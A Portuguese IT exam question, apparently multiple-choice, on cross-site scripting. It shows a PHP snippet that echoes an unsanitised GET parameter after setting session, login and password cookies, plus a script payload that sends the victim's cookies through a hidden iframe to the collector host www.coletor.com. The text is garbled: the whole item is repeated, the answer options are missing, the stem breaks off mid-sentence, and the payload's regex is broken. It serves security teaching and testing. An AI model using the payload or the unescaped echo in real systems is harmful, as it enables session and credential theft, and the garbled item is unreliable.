Considere o trecho de programa PHP abaixo.
<?php setcookie('PHPSSESID', 'meu_sid'); setcookie('login', 'meu_login'); setcookie('senha', 'minha_senha');
echo $_GET['var']; ?>
Supondo que ao executar este trecho, um usuário passou como entrada:
<script> document.write('<iframe width=1 height=1 src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>') </script>
cujo objetivo é capturar os dados de cookie do site alvo e enviá-los para o site www.coletor.com
Um Técnico de TI conclui corretamente que
<?php setcookie('PHPSSESID', 'meu_sid'); setcookie('login', 'meu_login'); setcookie('senha', 'minha_senha');
echo $_GET['var']; ?>
Supondo que ao executar este trecho, um usuário passou como entrada:
<script> document.write('<iframe width=1 height=1 src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>') </script>
cujo objetivo é capturar os dados de cookie do site alvo e enviá-los para o site www.coletor.com
Um Técnico de TI conclui corretamente que
